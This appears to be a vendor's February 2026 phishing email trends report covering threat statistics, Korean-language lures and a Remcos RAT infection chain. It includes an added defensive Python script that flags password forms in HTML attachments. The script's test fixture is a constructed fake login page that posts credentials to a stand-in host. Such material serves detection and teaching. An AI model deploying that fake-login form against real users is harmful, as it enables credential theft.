February 2026 Phishing Email Trends Report

This report provides statistics, trends, and case information on the distribution volume and attachment threats of phishing emails collected and analyzed during February 2026. This post contains part of the statistical data and cases included in the original report.

1) Phishing Email Threat Statistics

The most prevalent threat type among phishing email attachments in February 2026 was phishing (42%). Attackers used scripts such as HTML to closely mimic the screen layout, logos, and fonts of login pages or advertising pages. These pages lure users into entering their account credentials and passwords, which are then transmitted to the attacker's C2 server, or they redirect users to fake sites. This threat type also includes hyperlinks inserted into documents such as PDFs that direct users to phishing sites created by attackers.

[Figure 1] Phishing Email Threat Statistics
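
As an added example (not from the report or from ATIP), the sketch below triages an HTML attachment of the kind described in this section by flagging password fields and the host their form submits to. The class and function names, the sample markup, and the `collector.example` host are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class FormAudit(HTMLParser):
    """Record every <form>: its action URL and whether it holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": (attrs.get("action") or "").strip(), "password": False}
            self.forms.append(self._current)
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            if self._current is None:
                # Field outside any <form>: submission is handled by script.
                self.forms.append({"action": "", "password": True})
            else:
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def triage_html_attachment(html):
    """Return findings for an HTML attachment; an empty list means nothing flagged."""
    audit = FormAudit()
    audit.feed(html)
    findings = []
    for form in audit.forms:
        if not form["password"]:
            continue
        host = urlparse(form["action"]).hostname
        if host:
            findings.append("password form posts to remote host " + host)
        else:
            findings.append("password field with no remote form action")
    return findings

# Constructed samples (not taken from the report).
SAMPLE_FAKE_LOGIN = """<html><body><img src="logo.png">
<form method="post" action="https://collector.example/login.php">
<input type="text" name="user"><input type="password" name="pass">
</form></body></html>"""
SAMPLE_NEWSLETTER = '<html><body><form action="/search"><input type="text" name="q"></form></body></html>'
```

A mail gateway or analyst script can run this over each `.html`/`.htm` attachment; any password field in a file opened from an email is worth review, and the reported host is a candidate for blocking and log searches.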

Recent trends in threats originating from phishing emails are also shown through data on how the distribution volume of samples in each category has changed over the past six months. In addition, statistics on the file extensions of attachments found in phishing emails show which file formats are used in such emails. The statistical data not included in this summary can be found in the original ATIP report.

2) Korean Email Distribution Status

We classify phishing emails written in Korean and partially disclose the subject lines and attachment file names from these samples. This makes it possible to identify keywords that frequently appear in phishing email threats.

[Figure 2] Some of the Phishing Emails Distributed in Korean

3) Analysis of Phishing Email Distribution Cases

Representative cases were analyzed by attachment format (Script, Document, Compressed), showing actual phishing email attack cases from February. This month saw not only phishing pages (FakePage) delivered as Script attachments but also malware distributed via double-compressed files in phishing emails. When the JS file inside the compressed file is executed, it injects itself into the legitimate process "Aspnet_compiler.exe" and ultimately executes the Remcos RAT malware. Additionally, cases of malware that uses steganography techniques being distributed via phishing emails are increasing. Additional information, including analysis details such as the C2 address and the body text of the phishing email used to distribute the malware, can be found in the original ATIP report and ATIP Notes.

[Figure 3] Malware distributed as a compressed format attachment

[Figure 4] Malware distributed via a Document format attachment

This post discloses a portion of the February 2026 Trend Report on Phishing Emails. The original ATIP report contains additional content, including recent distribution volume trends for phishing (FakePage) and malware, statistics by attachment file extension, distribution volume, and analysis information on actual phishing email attacks.

 
